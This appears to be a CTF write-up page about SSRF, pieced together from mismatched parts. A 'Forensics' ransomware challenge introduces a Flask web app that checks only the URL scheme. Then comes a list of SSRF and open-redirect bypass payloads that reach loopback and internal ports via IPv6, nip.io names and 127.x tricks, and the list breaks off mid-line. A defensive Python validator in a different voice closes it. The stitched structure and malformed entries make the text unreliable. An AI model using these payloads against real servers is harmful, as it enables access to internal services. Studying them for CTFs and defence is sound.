Whoami
┌─[koimet@parrot]─[~]
└──╼ $whoami
koimet - captain fr334aks

SSRF

What is SSRF
A web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. ~portswigger
A web security vulnerability that lets attackers send requests from the server to other resources, both internal and external, and receive responses. ~acunetix
Why SSRF
Despite being an old class of vulnerability, it is still one of the less well known ones.
Howdy, we recently took part in HeroCTF V3 and settled for #68 out of 645 teams. Here are some of my writeups.
Forensics
We need you 1/5
Category: Forensics
Description: Interpol and the FBI have been investigating for over a year now. They are trying to get their hands on two hackers very well known for their ransomware and their ultra-efficient botnet.
After long months of investigation, they managed to get their hands on one of their servers.
Challenge Solution
We are also given the source file here
which had the following
and the challenge
the two Python scripts as follows:
    from flask import Flask, request, render_template
    from urllib.parse import unquote
    from bot import visit_report  # the headless-browser bot that fetches the submitted URL

    app = Flask(__name__)

    @app.route("/")
    def index():
        return render_template("index.html")

    @app.route("/api/submit", methods=["POST"])
    def submit():
        try:
            url = request.json.get("url")
            # The only validation: the URL must start with http:// or https://.
            # Nothing restricts the host, so the bot can be sent to internal targets.
            assert(url.startswith('http://') or url.startswith('https://'))
            visit_report(url)
            return {"success": 1, "message": "Thank you for your valuable submition!"}
        except:
            # Bare except: any failure (bad JSON, failed assert, bot error) is hidden from the client.
            return {"failure": 1, "message": "Something went wrong."}
SSRF
Hello there, below is a list of the most common SSRF payloads and open-redirect bypasses.
SSRF & Open Redirect Bypass
With [::], abuses IPv6
http://[::]/
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/ Squid
http://0000::1/
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/ Squid
With domain redirection, useful when all IP addresses are blacklisted
http://localtest.me
http://test.app.127.0.0.1.nip.io
http://test-app-127-0-0-1.nip.io
httP://test.app.127.0.0.1.xip.io
With CIDR, useful when just 127.0.0.1 is whitelisted
http://127.127.127.127/
http://127.0.1.3/
https:/127.0.0.0/
With IPv6/IPv4 address embedding, useful when both IPv4 and IPv6 are blacklisted (but blacklisted badly)
http://[0:0:0:0:0:ffff:127.
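As an added example (my own code, not from the write-up or the CTF's source), here is a Python check a defender could use in place of the startswith('http://') assertion in the Flask handler above; it covers the bypass classes listed in this section: bracketed IPv6 such as [::], wildcard-DNS names like localtest.me and nip.io that resolve to loopback, the whole 127.0.0.0/8 range rather than only 127.0.0.1, and IPv4-mapped IPv6. The FAKE_DNS table and the example.com address are constructed so the code runs offline; pass resolver=None to use real DNS.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed DNS table so the example runs offline. The wildcard names are
# the ones listed above; in reality they do resolve to 127.0.0.1.
FAKE_DNS = {
    "localtest.me": ["127.0.0.1"],
    "test.app.127.0.0.1.nip.io": ["127.0.0.1"],
    "example.com": ["93.184.216.34"],   # constructed "public" record
}

def resolve(host, resolver=None):
    """Return every address a hostname resolves to; a dict may stand in for DNS."""
    if resolver is not None:
        return resolver.get(host, [])
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def is_safe_url(url, resolver=None):
    """Replacement for the scheme-only check in the Flask handler.

    Parses the URL (bracketed IPv6 included), resolves the host, unwraps
    IPv4-mapped IPv6 (::ffff:a.b.c.d) and refuses anything that is not a
    globally routable address: loopback (all of 127.0.0.0/8), [::],
    private, link-local and unspecified ranges. Fails closed on errors.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname          # brackets stripped, lower-cased
    if not host:
        return False
    try:
        addrs = [ipaddress.ip_address(host)]   # literal IP in the URL
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host, resolver)]
        except (socket.gaierror, ValueError):
            return False
    if not addrs:                  # name did not resolve: nothing safe to fetch
        return False
    for addr in addrs:
        if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
            addr = addr.ipv4_mapped
        if not addr.is_global:     # every record must be public, not just one
            return False
    return True
```

The check still has to be bound to the actual connection: the fetcher should connect to the address that was validated (or re-validate after its own lookup) and re-run the check on every redirect hop, otherwise DNS rebinding or an open redirect reopens the hole.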